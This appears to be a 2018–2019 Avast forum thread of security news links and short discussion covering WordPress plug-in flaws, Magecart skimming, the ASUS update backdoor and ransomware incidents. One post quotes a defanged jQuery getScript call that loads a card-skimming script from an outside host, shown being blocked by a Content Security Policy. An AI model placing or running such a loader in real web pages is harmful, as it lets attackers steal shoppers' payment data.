https://www.zdnet.com/article/flaws-in-self-encrypting-ssds-let-attackers-bypass-disk-encryption/ (https://www.zdnet.com/article/flaws-in-self-encrypting-ssds-let-attackers-bypass-disk-encryption/)
-
Strange snafu misroutes domestic US Internet traffic through China Telecom
(https://screencast-o-matic.com/screenshots/u/Lh/1541514867099-95901.png)
https://arstechnica.com/information-technology/2018/11/strange-snafu-misroutes-domestic-us-internet-traffic-through-china-telecom/ (https://arstechnica.com/information-technology/2018/11/strange-snafu-misroutes-domestic-us-internet-traffic-through-china-telecom/)
-
Data storage devices from Samsung and others leave customers at risk
https://blog.avast.com/security-flaws-found-in-widely-used-data-storage-devices-avast
-
WordPress Design Flaw + WooCommerce Vulnerability Leads to Site Takeover
https://www.bleepingcomputer.com/news/security/wordpress-design-flaw-woocommerce-vulnerability-leads-to-site-takeover/
-
WordPress sites hacked via hole in GDPR-plug-in:
https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/
Abuse reported: https://www.reddit.com/r/Wordpress/comments/9vbtdb/slew_of_user_registrations_and_privilege/
Other abuse: https://www.wordfence.com/blog/2018/11/trends-following-vulnerability-in-wp-gdpr-compliance-plugin/
polonus
N.B. On a specific abuser: https://raidboxes.at/sicherheitsluecke-dsgvo-plugin-wordpress/
Read the analysis of this hack by Word Press user t2trollherten via a Russian IP address:
https://wordpress.stackexchange.com/questions/318755/understanding-website-hack
Damian
-
Another ongoing Word Press malware campain is via saks.made dot net:
Read: https://blog.sucuri.net/2018/10/saskmade-net-redirects.html
and http://dfir.pro/index.php?link_id=90047
and see: https://github.com/Hestat/lw-yara/blob/master/includes/saskmade-net-redirects.yar
polonus
-
This is disturbing.
Google Services Disrupted as Internet Traffic Diverts to China (https://www.pcmag.com/news/364922/google-services-disrupted-as-internet-traffic-diverts-to-chi?utm_source=email&utm_campaign=whatsnewnow&utm_medium=title)
Another reason why your VPN (https://www.avast.com/secureline-vpn#pc) should always be in use.
-
Security risk on AMP for WP – Accelerated Mobile Pages Plugin
https://www.webarxsecurity.com/amp-plugin-vulnerability/
-
Researchers Created Fake 'Master' Fingerprints to Unlock Smartphones
https://motherboard.vice.com/en_us/article/bjenyd/researchers-created-fake-master-fingerprints-to-unlock-smartphones
-
Security updates available for Flash Player | APSB18-44
https://helpx.adobe.com/security/products/flash-player/apsb18-44.html
-
Tackle the ever/existing threat of the gaping UPnP-hole - disable that service! ::)
1,7 million devices are at risk: https://blogs.akamai.com/sitr/2018/11/upnproxy-eternalsilence.html
Test: https://www.snbforums.com/threads/new-upnp-exploit-affecting-most-asus-routers-upnproxy-blackhat-proxies-via-nat-injections.46011/page-2#post-400981
Server header for a normal response could be "Microsoft-IIS/8.5",
while the header for a response during an attack would be "Microsoft-HTTPAPI/2.0.",
then pay attention whether (SSDP/UPnP) is present,
The ironical thing however is, that with newer versions of the UPnP protocol, we find minimal core security protection.
UPnP-attacks can be used to cause chaos, to create holes in firewalls, and other abuse.
UPnP deadly simple or simply deadly to leave it open on your machines, so disable it where you can.
polonus
-
Marriott Announces Starwood Guest Reservation Database Security Incident
http://news.marriott.com/2018/11/marriott-announces-starwood-guest-reservation-database-security-incident/
-
Security updates available for Flash Player | APSB18-42
https://helpx.adobe.com/security/products/flash-player/apsb18-42.html
-
ASUS, GIGABYTE Drivers Contain Code Execution Vulnerabilities - PoCs Galore
https://www.bleepingcomputer.com/news/security/asus-gigabyte-drivers-contain-code-execution-vulnerabilities-pocs-galore/
-
Microsoft Releases Out-of-Band Security Update for Internet Explorer RCE Zero-Day
https://www.bleepingcomputer.com/news/security/microsoft-releases-out-of-band-security-update-for-internet-explorer-rce-zero-day/
-
Security Bulletin for Adobe Acrobat and Reader | APSB19-02
https://helpx.adobe.com/security/products/acrobat/apsb19-02.html
-
Latest technology is not always rock-solidly safe and secure:
involving massive security breaches or thefts involving blockchains.
Read: https://magoo.github.io/Blockchain-Graveyard/
Security through obscurity demanding it's toll:
Massive security breaches or thefts involving blockchains. (info credits go to FTREPORTER).
polonus
-
A lot of malware lurks in google searches, some even have the brass neck to pay for search placement on specific search words/terms or have sponsored links. Google really need to be more proactive in rooting out the possibly malicious/fraudulent sponsored links or search placement.
That's the reason (for me) for not using google search.
-
A lot of malware lurks in google searches, some even have the brass neck to pay for search placement on specific search words/terms or have sponsored links. Google really need to be more proactive in rooting out the possibly malicious/fraudulent sponsored links or search placement.
That's the reason (for me) for not using google search.
That's one of the reason you should be using the Avast Online Security extension. :)
(https://screencast-o-matic.com/screenshots/u/Lh/1546656621466-62740.png)
-
Bob3160 is a 100% right. Do use the pro-active blocking via Avast Secure Browsing,
to stop for instance abuse campaigns like from so-called freetrade scam platforms.
Also stops abuse scripts from here: -https://3v4l.org/ an online PHP editor,
that can also be used for nefarious purposes.
This for instance was blocked for me -https://3v4l.org/2CBnj.
The abusive script was blocked to run in it's tracks from the word go.
polonus
-
Whenever you own or make use of a Magento 1 or 2 CMS driven webshop,
it is a good thing to check the retirability of your javascript libraries here:
https://retire.insecurity.today/ and your CMS vulnerabilities here: https://www.magereport.com/
Very advanced javascript XSS injection code, obfuscated and sometimes not longer than 75 or even 22 sophisticated lines long,
is being abused for credit card stealing and other data skimming purposes by members of the cybercriminal Magecart
or Group 11 cyber-criminals.
If you do not pay attention they may rob your creditcard clean of all the money.
Re: https://gwillem.gitlab.io/2018/10/23/magecart-extension-0days/
Group 11 or Magecart malcreant developers loves to malcreate on the basis of hook.js & bootstrap.js for instance,
Re: https://www.hybrid-analysis.com/sample/c19270ebf25dd7442462159dd371a6830815d3202cdc896690885c2e46509d86?environmentId=100
This helped by the fact there are so many PHISHING sites around for their evil-doing and also server weaknesses like BEef, etc.
Background read: https://www.riskiq.com/blog/labs/magecart-vision-direct/
polonus (volunteer 3rd party website security analyst and website error-hunter)
-
New ServHelper Backdoor and FlawedGrace RAT Pushed by Necurs Botnet
https://www.bleepingcomputer.com/news/security/new-servhelper-backdoor-and-flawedgrace-rat-pushed-by-necurs-botnet/ (https://www.bleepingcomputer.com/news/security/new-servhelper-backdoor-and-flawedgrace-rat-pushed-by-necurs-botnet/)
-
Fake Movie File Infects PC to Steal Cryptocurrency, Poison Google Results
https://www.bleepingcomputer.com/news/security/fake-movie-file-infects-pc-to-steal-cryptocurrency-poison-google-results/ (https://www.bleepingcomputer.com/news/security/fake-movie-file-infects-pc-to-steal-cryptocurrency-poison-google-results/)
-
Eight months after discovery, unkillable LoJax rootkit campaign remains active
https://arstechnica.com/information-technology/2019/01/8-months-after-its-discovery-unkillable-lojax-rootkit-campaign-remains-active/ (https://arstechnica.com/information-technology/2019/01/8-months-after-its-discovery-unkillable-lojax-rootkit-campaign-remains-active/)
-
New Magecart Attack Delivered Through Compromised Advertising Supply Chain
https://blog.trendmicro.com/trendlabs-security-intelligence/new-magecart-attack-delivered-through-compromised-advertising-supply-chain/
Skimming script
https://www.virustotal.com/#/file/80e40051baae72b37fee49ecc43e8dded645b1baf5ce6166c96a3bcf0c3582ce/detection
https://www.virustotal.com/#/file/87ee0ae3abcd8b4880bf48781eba16135ba03392079a8d78a663274fde4060cd/detection
https://www.virustotal.com/#/file/f1f905558c1546cd6df67504462f0171f9fca1cfe8b0348940aad78265a5ef73/detection
https://www.virustotal.com/#/file/56cca56e39431187a2bd95e53eece8f11d3cbe2ea7ee692fa891875f40f233f5/detection
-
Word Press warns for servers with old (outdated) PHP versions:
https://make.wordpress.org/core/2019/01/14/php-site-health-mechanisms-in-5-1/ (source credits Felix Arntz);
See for warnings: https://wordpress.org/support/update-php/
Mind back patching distro's for issues.
Read: https://sucuri.net/guides/how-to-clean-hacked-wordpress
Check at https://hackertarget.com/wordpress-security-scan/
Check libraries at https://retire.insecurity.today/#
or at
https://webhint.io/scanner/ at security with Snort Rules.
For PHP version 7 check compatibility at: https://wpengine.com/blog/php-7-compatibility-checker-plugin/
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
A lot of malware lurks in google searches, some even have the brass neck to pay for search placement on specific search words/terms or have sponsored links. Google really need to be more proactive in rooting out the possibly malicious/fraudulent sponsored links or search placement.
That's the reason (for me) for not using google search.
That's one of the reason you should be using the Avast Online Security extension. :)
(https://screencast-o-matic.com/screenshots/u/Lh/1546656621466-62740.png)
I'm using it since years (see my sig, please). :)
-
Cryptominer removes protection software on Linux servers:
First they disable cloud monitoring service, deinstalling it the way an admin would do.
Malcrean ts getting more and more dastardly in their ways.
https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/
polonus
-
I had forgotten how long CryptoLocker has been a part of the scene:
https://forum.avast.com/index.php?topic=19387.msg179783#msg179783
I posted that back in 2006
-
Serious Drupal holes: https://www.us-cert.gov/ncas/current-activity/2019/01/16/Drupal-Releases-Security-Updates
Re: https://www.drupal.org/sa-core-2019-001 and https://www.drupal.org/sa-core-2019-002
And again at the heart of the problem lies not sufficiently validated PHP.
PHP developer keep your cheat-sheets ready.
Read: https://phpsecurity.readthedocs.io/en/latest/Input-Validation.html
Sometimes file expectations are wronly being interpreted:
https://stackoverflow.com/questions/15943926/php-possible-weaknesses-for-filter-validate-url-fopenurl-r-url-validati
and see other PHP related trouble: https://www.tenable.com/plugins/nessus/17715
polonus
-
Facebook Caught Red Handed While Swiping Money From Children
https://www.bleepingcomputer.com/news/security/facebook-caught-red-handed-while-swiping-money-from-children/
-
Facebook Caught Red Handed While Swiping Money From Children
I'm astonished that a company with such a reputation for integrity, transparency and fair dealing would resort to such practices ;D
-
Magecart hackers rejoice: https://gwillem.gitlab.io/2019/01/17/adminer-4.6.2-file-disclosure-vulnerability/
Check your Magento CMS here: https://www.magereport.com/
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Malcreants adopted PEAR version that was online for half a year.
Archived phar files are not checked too often against being compromised:
Check the repository for the right non-malicious archive: https://github.com/pear
AV should pay more attention to such open source code for being altered and compromised ;)
pol
-
Google is proposing a change to Chrome that would break ad blockers like uBlock Origin
https://9to5google.com/2019/01/22/google-chrome-break-ad-blockers/amp/?__twitter_impression=true
-
Google is proposing a change to Chrome that would break ad blockers like uBlock Origin
https://9to5google.com/2019/01/22/google-chrome-break-ad-blockers/amp/?__twitter_impression=true
Interesting, I already avoid Google Chrome (where ever possible 1 exception android mobile) and this certainly isn't going to get me to install it.
I just wonder how this would Impact ASB as it is based on Chromium. Assuming that ASB and Avast allow uBlock Origin add-on to be installed.
-
No-Name-Smart-Home: Security flaw allows easy firmware upload
https://www.heise.de/newsticker/meldung/No-Name-Smart-Home-Security-flaw-allows-easy-firmware-upload-4285085.html
-
New Ursnif Malware Campaign Uses Fileless Infection to Avoid Detection
https://www.bleepingcomputer.com/news/security/new-ursnif-malware-campaign-uses-fileless-infection-to-avoid-detection/ (https://www.bleepingcomputer.com/news/security/new-ursnif-malware-campaign-uses-fileless-infection-to-avoid-detection/)
-
Word Press websites hijacked via zero-day in plug-in:
https://www.wordfence.com/blog/2019/01/wordpress-sites-compromised-via-zero-day-vulnerabilities-in-total-donations-plugin/
polonus
-
Dailymotion subject to a computer attack
https://press.ondailymotion.com/en/dailymotion-subject-to-a-computer-attack/
-
Discover Card Users Affected by Data Breach, New Credit Cards Issued
https://www.bleepingcomputer.com/news/security/discover-card-users-affected-by-data-breach-new-credit-cards-issued/
-
Another very misleading topic that makes it appear that the Discover Card system was breached It was not
-
https://www.engadget.com/2019/01/30/google-chrome-lookalike-url-warning/
-
https://www.engadget.com/2019/01/30/google-chrome-lookalike-url-warning/ (https://www.engadget.com/2019/01/30/google-chrome-lookalike-url-warning/)
A feature that has been part of the Avast AOS for a very long time.
-
Facebook Moves to Block Ad Transparency Tools
https://www.propublica.org/article/facebook-blocks-ad-transparency-tools
-
Backdoored cryptocurrency software found serving AZORult malware
https://www.zdnet.com/article/backdoored-cryptocurrency-software-found-serving-azorult-malware/ (https://www.zdnet.com/article/backdoored-cryptocurrency-software-found-serving-azorult-malware/)
-
IcedID banking trojan now used against online retailers
https://www.scmagazine.com/home/security-news/malware/icedid-banking-trojan-now-used-against-online-retailers/ (https://www.scmagazine.com/home/security-news/malware/icedid-banking-trojan-now-used-against-online-retailers/)
-
Phishing campaign targeted subscribers to Tibetan Government-in-Exile’s mailing list
https://www.scmagazine.com/home/security-news/phishing-campaign-targeted-subscribers-to-tibetan-government-in-exiles-mailing-list/ (https://www.scmagazine.com/home/security-news/phishing-campaign-targeted-subscribers-to-tibetan-government-in-exiles-mailing-list/)
-
620 million accounts stolen from 16 hacked websites now for sale on dark web, seller boasts
https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/
-
Chip and PIN protections may fall short as future threats materialize
https://www.scmagazine.com/home/security-news/chip-and-pin-protections-may-fall-short-as-future-threats-materialize/ (https://www.scmagazine.com/home/security-news/chip-and-pin-protections-may-fall-short-as-future-threats-materialize/)
-
Dirty Sock vulnerability lets attackers gain root access on Linux systems
https://www.zdnet.com/article/dirty-sock-vulnerability-lets-attackers-gain-root-access-on-linux-systems/
-
Hackers wipe US servers of email provider VFEmail
https://www.zdnet.com/article/hackers-wipe-us-servers-of-email-provider-vfemail/
-
Surprised, I haven't seen Avast make any statement regarding this.
This Trojan exploits antivirus software to steal your data
https://www.zdnet.com/article/this-new-malware-exploits-bugs-in-antivirus-software-to-steal-your-data/ (https://www.zdnet.com/article/this-new-malware-exploits-bugs-in-antivirus-software-to-steal-your-data/)
This version injects a malicious module into one of Avast's processes, whereas early versions of the campaign detected Avast and quit. As Avast is the most common antivirus software in the world, this is an effective evasive strategy.
aswrundll.exe is the Avast Software Runtime Dynamic Link Library that is responsible for running modules for Avast. aswrundll.exe is very similar to Microsoft’s own rundll32.exe - it allows one to execute DLLs by calling their exported functions. The use of aswrundll.exe as a LOLbin has been mentioned in the past year.
https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil (https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil)
-
Thanks, I forwarded it...
-
Thanks, I forwarded it...
Thank you.https://www.bleepingcomputer.com/news/security/new-astaroth-trojan-variant-exploits-anti-malware-software-to-steal-info/
Update February 13 2019 20:00 EST: Article updated post-publication with additional comments from Avast:We learned today about this particular Astaroth trojan variant analyzed in Cybereason’s report. Since this is not an exploit, there is no obligation for them to provide formal or advance communication. The authors misuse a trusted binary to run the malware, in this case they used an Avast process, probably due to the size of our user base in the target country of Brazil. One important thing to consider is that this is neither an injection nor a privilege escalation. Installed Avast binaries have self-protection mechanisms in place to avoid injections. In this instance, they are using an Avast file to run a binary in a similar way that a DLL using Windows’ rundll32.exe can run. We had previously issued a detection for the malware so all Avast users are protected from this variant. Additionally, we will be implementing changes to our environment to ensure the same process cannot be misused in this way the future.
Hopeing that avast's aswrundll.exe is protected by Avast and it has self-protection mechanism too.
-
DNS Infrastructure Hijacking Campaign (Updated: 13, 2019)
https://www.us-cert.gov/ncas/alerts/AA19-024A
https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/
-
Hacked USB Cable
(https://screencast-o-matic.com/screenshots/u/Lh/1550175417892-81108.png)
https://youtu.be/uFcWlqQIOIY (https://youtu.be/uFcWlqQIOIY)
-
Hacked USB Cable
(https://screencast-o-matic.com/screenshots/u/Lh/1550175417892-81108.png)
https://youtu.be/uFcWlqQIOIY (https://youtu.be/uFcWlqQIOIY)
Very sneaky and scary and how to tell.
-
You can read more about it here,
https://www.pcmag.com/news/366478/evil-usb-cable-can-remotely-accept-commands-from-hacker?utm_source=email&utm_campaign=whatsnewnow&utm_medium=title
I put the video together for my next presentation. (2020)
-
Emotet Uses Camouflaged Malicious Macros to Avoid Antivirus Detection
https://www.bleepingcomputer.com/news/security/emotet-uses-camouflaged-malicious-macros-to-avoid-antivirus-detection/ (https://www.bleepingcomputer.com/news/security/emotet-uses-camouflaged-malicious-macros-to-avoid-antivirus-detection/)
-
Ransomware attackers exploit old plug-in flaw to infect MSPs and their clients
https://www.scmagazine.com/home/security-news/ransomware-attackers-exploit-old-plug-in-flaw-to-infect-msps-and-their-clients/ (https://www.scmagazine.com/home/security-news/ransomware-attackers-exploit-old-plug-in-flaw-to-infect-msps-and-their-clients/)
-
https://selabs.uk/en/reports/consumers (https://selabs.uk/en/reports/consumers)
-
https://selabs.uk/en/reports/consumers (https://selabs.uk/en/reports/consumers)
What I instantly noticed is Defenders rating.
Hope Avast is also paying attention.
-
https://selabs.uk/en/reports/consumers (https://selabs.uk/en/reports/consumers)
What I instantly noticed is Defenders rating.
Hope Avast is also paying attention.
+1
-
https://selabs.uk/en/reports/consumers (https://selabs.uk/en/reports/consumers)
What I instantly noticed is Defenders rating.
Hope Avast is also paying attention.
Avira Free also ahead of avast!
What is Avast doing? ???
-
Avira Free also ahead of avast!
What is Avast doing? ???
All good anti-viruses are very close in protection, so it's not strange.
-
Avira Free also ahead of avast!
What is Avast doing? ???
All good anti-viruses are very close in protection, so it's not strange.
See PROTECTION ACCURACY:Only 80%
-
Looking at those topic titles, they don't make sense to me
What it the difference between 'Protection Accuracy' and 'Legitimate Accuracy'
And then there is this 'Total Accuracy' were there is some sort of fudge factor to come up with 'Total Accuracy' ?
Surely we should only be concerned with Protection Accuracy, whatever that means.
It also seems strange with different results for AVG.
-
It is unwise to give Starbuck's your real name:
https://www.welivesecurity.com/2019/02/13/why-you-should-choose-pseudonym-at-starbucks/
polonus
-
New free decryptiontool for GrandCrab malware to be downloaded here:
https://www.nomoreransom.org/
New GrandCrab uri: https://urlhaus.abuse.ch/url/139738/
10 to detect: https://www.virustotal.com/#/url/988d3f525646c4e72d171cee3a8ba5da1595fc2edb14df0602c2d0f0032ff033/detection
polonus (volunteer website security analyst and website error-hunter)
-
Another unpatched hole in Word Press CMS and via vulnerable plug-ins:
https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
polonus
-
Microsoft Edge Secret Whitelist Allows Facebook to Autorun Flash
https://www.bleepingcomputer.com/news/security/microsoft-edge-secret-whitelist-allows-facebook-to-autorun-flash/
-
Security Updates available for Adobe Acrobat and Reader | APSB19-13
https://helpx.adobe.com/security/products/acrobat/apsb19-13.html
-
New browser attack lets hackers run bad code even after users leave a web page
https://www.zdnet.com/article/new-browser-attack-lets-hackers-run-bad-code-even-after-users-leave-a-web-page/
-
PDF signature-spoofing
Read: https://www.pdf-insecurity.org/
polonus
-
Fake mobile CCleaner app sneaked into the China Baidu app store.
https://blog.avast.com/fake-mobile-ccleaner-app-tricking-users
-
StealthWorker Malware Uses Windows, Linux Bots to Hack Websites
https://www.bleepingcomputer.com/news/security/stealthworker-malware-uses-windows-linux-bots-to-hack-websites/ (https://www.bleepingcomputer.com/news/security/stealthworker-malware-uses-windows-linux-bots-to-hack-websites/)
-
New LockerGoga Ransomware Allegedly Used in Altran Attack
https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/
-
PHP-based CMS, it may be a continuous can of worms...
WordPress webshops attacked through another plug-in security hole :
Read: https://wordpress.org/plugins/woocommerce-abandoned-cart/
and https://www.wordfence.com/blog/2019/03/xss-flaw-in-abandoned-cart-plugin-leads-to-wordpress-site-takeovers/
Also worth while to scan with: https://hackertarget.com/wordpress-security-scan/
and https://webhint.io/scanner/
but first things first - update, update and patch always,
polonus
-
For security specialists only, using reverse engineering for ethical pentesting purposes.
Javascript being sort of my kettle of fish, is what brought me to dive into some of the minor issues below.
So I have to give out some form of warning to be careful with the use of unsupported bootstrap.js open modals
in combination with exploitable Kafka Manager for instance or Hadoop, without considering such weaknesses.
Read: https://snyk.io/vuln/npm:bootstrap (mainly unpatched).
Undefined serialization issues on particular reverse engineer tools, like the just released Ghidra tool.
Re: https://www.virustotal.com/#/url/f30aa74b8135eb48a06a0a86dda19853fc9f3d6d9c7ce871af21c25781ebaa56/detection
So researchers that decide to use such a tool that recently has become available should be aware of possible issues
with for instance "unsupported-bootstrap-f18e970de8731748.js" and several DNS pre-fetches involved.
Also consider for bootstrap.js: https://github.com/twbs/bootstrap/pull/28236
polonus (volunteer website security analyst and website error-hunter)
-
Phishing scam fakes Facebook
https://blog.avast.com/ios-phishing-scam-steals-facebook-logins
-
Malicious Counter-Strike 1.6 servers used zero-days to infect users with malware
https://www.zdnet.com/article/malicious-counter-strike-1-6-servers-used-zero-days-to-infect-users-with-malware/
Dr.Web report > pdf.doc https://st.drweb.com/static/new-www/news/2019/march/belonard_trojan_en.pdf
-
Intel Fixes High Severity Vulnerabilities in Graphics Driver for Windows
https://www.bleepingcomputer.com/news/security/intel-fixes-high-severity-vulnerabilities-in-graphics-driver-for-windows/
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00189.html
-
Many webshops fall victim to form-jacking
Think of the Magecart campaign and recently
https://www.group-ib.com/media/js-sniffer/
payment data of thousands of customers of UK and US online stores could have been compromised
It is loading the script from gmo.li using a jQuery getScript call, so a properly constructed CSP would have blocked it. Tested using one of my own CSP protected sites. See result here:
$.getScript('hxtp://gmo.li/js.php?r=008353')
Content Security Policy: The page’s settings blocked the loading of a resource at hxtp://gmo.li/js.php?r=008353&_=1552623429549 (“default-src”).
Implementing CSP on someone else's code would be really tough.
info credits go to foxonsafari.
polonus
-
One of the biggest Aluminium producers hit by ransomeware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137
polonus
-
One of the biggest Aluminium producers hit by ransomeware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137
polonus
In English https://www.newsinenglish.no/2019/03/19/hydro-comes-under-major-cyber-attack/
-
One of the biggest Aluminium producers hit by ransomeware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137
polonus
In English https://www.newsinenglish.no/2019/03/19/hydro-comes-under-major-cyber-attack/
If this does nothing else, it should show business has to isolate critical systems and have a robust backup and recovery strategy. Assuming they have an IT department.
-
WordPress sites under attack via vulnerable plug-in: https://wordpress.org/plugins/easy-wp-smtp/#developers
Attacks ongoing since March 15th: https://blog.nintechnet.com/critical-0day-vulnerability-fixed-in-wordpress-easy-wp-smtp-plugin/
Update the plug-in in question: https://www.wordfence.com/blog/2019/03/hackers-abusing-recently-patched-vulnerability-in-easy-wp-smtp-plugin/
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Not sure if this is the correct thread but I am getting warnings on a few sites I manage:
hxxp://best-home-security-systems.com/
hxxps://homesecuritysystems-local.com/
hxxp://californiahomesecuritysystems.com/
The message:
Warning
This site could have harmed your computer
Get me out of here
Any info would be appreciated.
-
Not sure if this is the correct thread but I am getting warnings on a few sites I manage:
hxxp://best-home-security-systems.com/
hxxps://homesecuritysystems-local.com/
hxxp://californiahomesecuritysystems.com/
The message:
Warning
This site could have harmed your computer
Get me out of here
Any info would be appreciated.
Report a URL
https://www.avast.com/report-a-url.php
-
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
-
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
https://www.virustotal.com/#/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection
Kaspersky https://securelist.com/operation-shadowhammer/89992/
We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found.
-
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html (https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html)
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers (https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers)
https://www.virustotal.com/#/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection (https://www.virustotal.com/#/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection)
Kaspersky https://securelist.com/operation-shadowhammer/89992/ (https://securelist.com/operation-shadowhammer/89992/)
We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found.
The simple answer is Yes. I certainly wouldn't suggest downloading a tool from Kaspersky in light of the fact that Avast detects this malware. :)
-
The simple answer is Yes. I certainly wouldn't suggest downloading a tool from Kaspersky in light of the fact that Avast detects this malware. :)
So if a Avast scan is done and the results is clean it means the computer isn't infected or affected by any of this?
-
Correct. :)
-
Correct. :)
Partly correct
You can still have one of the network adapter listed, you may have one made by Asus even if not running a Asus computer
-
You can still have one of the network adapter listed, you may have one made by Asus even if not running a Asus computer
Please explain what you mean.
-
There are two things in combination here
-the backdoored version of ASUS Live Update
-the network adapters targeted
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
The researchers estimate half a million Windows machines received the malicious backdoor through the ASUS update server, although the attackers appear to have been targeting only about 600 of those systems. The malware searched for targeted systems through their unique MAC addresses. Once on a system, if it found one of these targeted addresses, the malware reached out to a command-and-control server the attackers operated, which then installed additional malware on those machines.
-
There are two things in combination here
-the backdoored version of ASUS Live Update
-the network adapters targeted
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers (https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers)
The researchers estimate half a million Windows machines received the malicious backdoor through the ASUS update server, although the attackers appear to have been targeting only about 600 of those systems. The malware searched for targeted systems through their unique MAC addresses. Once on a system, if it found one of these targeted addresses, the malware reached out to a command-and-control server the attackers operated, which then installed additional malware on those machines.
That malware, if a scan were to be run, would be detected by Avast. I may well be detected without running a scan.
-
ASUS response to the recent media reports regarding ASUS Live Update tool attack by Advanced Persistent Threat (APT) groups
https://www.asus.com/News/hqfgVUyZ6uyAyJe1
https://www.bleepingcomputer.com/news/security/asus-admits-its-live-update-utility-was-backdoored-by-apt-group/
-
Security Bulletin: NVIDIA GeForce Experience – March 2019
https://nvidia.custhelp.com/app/answers/detail/a_id/4784/kw/Security%20Bulletin
-
ASUS Releases Security Update for Live Update Software
https://www.us-cert.gov/ncas/current-activity/2019/03/26/ASUS-Releases-Security-Update-Live-Update-Software
-
ASUS response to the recent media reports regarding ASUS Live Update tool attack by Advanced Persistent Threat (APT) groups
https://www.asus.com/News/hqfgVUyZ6uyAyJe1
https://www.bleepingcomputer.com/news/security/asus-admits-its-live-update-utility-was-backdoored-by-apt-group/
Is this firmware update (which is over two months old) affected by this issue?
-
Toyota announces second security breach in the last five weeks
https://www.zdnet.com/article/toyota-announces-second-security-breach-in-the-last-five-weeks/
-
Vulnerable Word Press CMS websites under constant attack via PHPMYADMIN_WORM
Look at all that worm-activity going on, ->: https://viz.greynoise.io/table
Not a cyberfriendly place on that Visualizer. Look at this random chosen source of infection:
https://www.shodan.io/host/115.68.108.67
Word Press & PHP and also modern languages like Slick.
Net-scans for instance with malicious PHPMYADMIN_WORM
scanner functions via PHP/5.6.0
The phar_parse_zipfile function in zip.c in the PHAR extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read and application crash) by placing a PK\x05\x06 signature at an invalid location.
Keep an eye on this forthcoming logs, you cyberdefense folks. Word Press CMS admins look after your configuration and eventual compromittal. You are under constant attack from all corners all over the globe.
Do you know what all these crawlers and bad bots are up to all the time all of the time? Time to come and stop and block.
Info credits go to J.O.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
2 million Apache webservers vulnerable through a gaping hole - possible Server Privilege Escalation:
https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2019-0211
https://blog.rapid7.com/2019/04/03/apache-http-server-privilege-escalation-cve-2019-0211-what-you-need-to-know/
Patch else hackers may go for this low hanging fruit via excessive server info proliferation, you may be spreading.
So at least go for an extra security model like SELinux GRSecurity (a very good one), Yamato or AppArmor.
polonus (volunteer website security analyst and website error-hunter)
-
Year-Old DoS Vulnerability Allows Attacks on Some MikroTik Routers
https://www.bleepingcomputer.com/news/security/year-old-dos-vulnerability-allows-attacks-on-some-mikrotik-routers/
-
25% of Phishing Emails Bypass Office 365 Default Security
https://www.bleepingcomputer.com/news/security/25-percent-of-phishing-emails-bypass-office-365-default-security/
-
New TajMahal Cyberespionage Kit Includes 80 Malicious Modules
https://www.bleepingcomputer.com/news/security/new-tajmahal-cyberespionage-kit-includes-80-malicious-modules/
-
WPA3 Wi-Fi Standard Affected by New Dragonblood Vulnerabilities
https://www.bleepingcomputer.com/news/security/wpa3-wi-fi-standard-affected-by-new-dragonblood-vulnerabilities/
-
